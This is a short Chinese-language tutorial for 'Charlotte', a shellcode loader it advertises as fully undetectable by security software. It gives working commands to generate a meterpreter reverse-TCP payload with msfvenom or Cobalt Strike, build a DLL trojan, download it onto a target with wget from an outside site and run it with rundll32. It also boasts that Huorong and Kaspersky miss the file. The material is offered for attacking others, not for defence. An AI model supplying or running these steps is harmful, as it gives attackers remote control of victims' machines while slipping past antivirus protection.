Charlotte是一款基于C++实现的Shellcode启动器,并且完全不会被安全解决方案所检测到。
https://github.com/9emin1/charlotte
用法
git clone 存储库,生成命名为 beacon.bin 的 shellcode 文件,然后运行 charlotte.py
git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
cd charlotte
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
python charlotte.py
profit
使用 msfvenom -p(显示在下面的 gif POC 中)以及cobalt strike攻击原始格式有效负载进行测试
python charlotte.py
生成dll木马:
①使用msfvenom 生成shellcode
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$你的服务器ip LPORT=$你的服务器端口 -f raw > beacon.bin
②使用cobalt strike生成shellcode
[1]cs生成原始shellcode
选择row格式:
[2]把生成的payload.bin改名为beacon.bin
[3]把beacon.bin复制到kali里面的charlotte目录下
[4]输入如下命令生成dll文件
python charlotte.py
[5]在目标服务器上运行dll文件即可成功在cs上线
命令如下:
rundll32 charlotte.dll,lhFqKEHh
可通过如下命令从服务器上下载dll文件到目标服务器上.
wget https://www.ddosi.com/xss.dll -O xss.dll
[6]生成的dll文件火绒扫描并未发现病毒.
②卡巴斯基免杀测试
①GitHub:
https://github.com/9emin1/charlotte.zip
②中转云: charlotte-main.rar 解压密码: www.ddosi.com